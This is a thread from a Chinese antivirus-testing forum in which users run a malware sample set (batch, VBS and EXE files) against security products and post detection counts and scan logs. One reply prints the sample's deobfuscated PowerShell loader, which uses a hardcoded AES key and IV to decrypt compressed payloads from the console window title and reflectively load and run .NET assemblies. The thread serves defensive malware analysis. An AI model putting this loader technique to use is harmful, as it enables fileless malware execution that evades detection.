楼主: petr0vic
收起左侧

[病毒样本] x5 (2024-03-26)

[复制链接]
DisaPDB
发表于 2024-3-26 17:45:58 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-3-26 19:42 编辑

seems like there's something differences between the two versions
01.bat

02.bat

2.vbs

3.exe


Total:4/5


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
petr0vic + 1

查看全部评分

祸兮福所倚
头像被屏蔽
发表于 2024-3-26 17:50:57 | 显示全部楼层

外面的毒好杀,心中的毒难除!我还没能在人生的大梦中觉醒,总这样玩杀毒混下去也不是个办法,即将春暖花开,我要去寻找人生的意义!
dght432
发表于 2024-3-26 17:51:42 来自手机 | 显示全部楼层
DisaPDB 发表于 2024-3-26 17:45
seems like there's something wrong between the two versions
01.bat


阻止开机启动应该算
miss了
DisaPDB
发表于 2024-3-26 17:53:19 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-3-26 18:01 编辑
dght432 发表于 2024-3-26 17:51
阻止开机启动应该算
miss了

后面有拦截PowerShell调用
简单看了一下
  1. # 定义常量
  2. $EncryptionKeyBase64 = 'TZZo3Oy5UDTtuZMlgdmieEOW4zZIIcSc2xfryRmaONM='
  3. $EncryptionIVBase64 = '7GraJ09wxBgZlzUP66oYKg=='
  4. $AES = [System.Security.Cryptography.Aes]::Create()
  5. $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
  6. $AES.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
  7. $AES.Key = [System.Convert]::FromBase64String($EncryptionKeyBase64)
  8. $AES.IV = [System.Convert]::FromBase64String($EncryptionIVBase64)

  9. # 加密/解密函数
  10. function Encrypt-Data ($data) {
  11.     return $AES.CreateEncryptor().TransformFinalBlock($data, 0, $data.Length)
  12. }

  13. function Decrypt-Data ($encryptedData) {
  14.     return $AES.CreateDecryptor().TransformFinalBlock($encryptedData, 0, $encryptedData.Length)
  15. }

  16. # 解压缩函数
  17. function Decompress-Data ($compressedData) {
  18.     $inputStream = New-Object System.IO.MemoryStream @(, $compressedData)
  19.     $outputStream = New-Object System.IO.MemoryStream
  20.     $gzipStream = New-Object System.IO.Compression.GZipStream $inputStream, [IO.Compression.CompressionMode]::Decompress
  21.     $gzipStream.CopyTo($outputStream)
  22.     $gzipStream.Dispose()
  23.     $inputStream.Dispose()
  24.     return $outputStream.ToArray()
  25. }

  26. # 获取当前命令行窗口标题
  27. $windowTitle = [Console]::Title

  28. # 提取并解密数据
  29. $encryptedPart1 = [System.Linq.Enumerable]::Skip([char[]]$windowTitle, 5).ToArray() -join ''
  30. $decryptedPart1 = Decrypt-Data ([System.Convert]::FromBase64String($encryptedPart1))

  31. $encryptedPart2 = [System.Linq.Enumerable]::Skip([char[]]$windowTitle, 6).ToArray() -join ''
  32. $decryptedPart2 = Decrypt-Data ([System.Convert]::FromBase64String($encryptedPart2))

  33. # 解压缩数据
  34. $decompressedPart1 = Decompress-Data $decryptedPart1
  35. $decompressedPart2 = Decompress-Data $decryptedPart2

  36. # 反射加载并执行恶意代码
  37. $assembly1 = [System.Reflection.Assembly]::Load($decompressedPart1)
  38. $assembly1.EntryPoint.Invoke($null, $null)

  39. $assembly2 = [System.Reflection.Assembly]::Load($decompressedPart2)
  40. $assembly2.EntryPoint.Invoke($null, $null)
复制代码



keen-qv
发表于 2024-3-26 18:35:06 | 显示全部楼层
本帖最后由 keen-qv 于 2024-3-26 18:42 编辑
祸兮福所倚 发表于 2024-3-26 17:50
外面的毒好杀,心中的毒难除!我还没能在人生的大梦中觉醒,总这样玩杀毒混下去也不是个办法,即将春暖花 ...

内心的病毒并不难除去。你需要感谢它,内心的挣扎与困惑,正是人生成长与觉醒的过程所在。在追寻人生意义的道路上,正视内心系统的隐秘深处,勇敢面对内心的病毒,不要逃避或忽视。通过内心的探索与洞察,或许能够找到清晰的方向,解开心中的纠结?最终获得更深层次的认知与觉悟。不应将内心的病毒视作无法除去的顽固病毒,它并没有与你内心的安全软件做对抗,反而是将其视为成长与觉醒的契机,犹如ai查杀引擎的不断进化,希望你能走向更高层次的人生境界。

评分

参与人数 1人气 +2 收起 理由
祸兮福所倚 + 2 感谢解答:)版区有你更精彩:)

查看全部评分

biue
发表于 2024-3-26 22:16:35 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Nocria
发表于 2024-3-26 22:31:54 | 显示全部楼层
Avira - 1/5

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
UNknownOoo
发表于 2024-3-27 00:08:40 | 显示全部楼层
火绒
扫描:3x
  1. 病毒详情:
  2. 风险路径:C:\Users\UnknownOoo\Downloads\Compressed\02.bat, 病毒名:Trojan/BAT.Agent.bw, 病毒ID:9d30624f2530e8ed, 处理结果:暂不处理
  3. 风险路径:C:\Users\UnknownOoo\Downloads\Compressed\01.bat, 病毒名:Trojan/BAT.Agent.bw, 病毒ID:9d30624f2530e8ed, 处理结果:暂不处理
  4. 风险路径:C:\Users\UnknownOoo\Downloads\Compressed\2.vbs, 病毒名:Trojan/Generic!EF5416F1E9857E78, 病毒ID:ef5416f1e9857e78, 处理结果:暂不处理
复制代码
swizzer
发表于 2024-3-27 00:29:29 | 显示全部楼层
DI all.


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
神龟Turmi
发表于 2024-3-27 01:57:49 | 显示全部楼层

360TS FileLess Protection require VIP...
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-4 13:33 , Processed in 0.095634 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表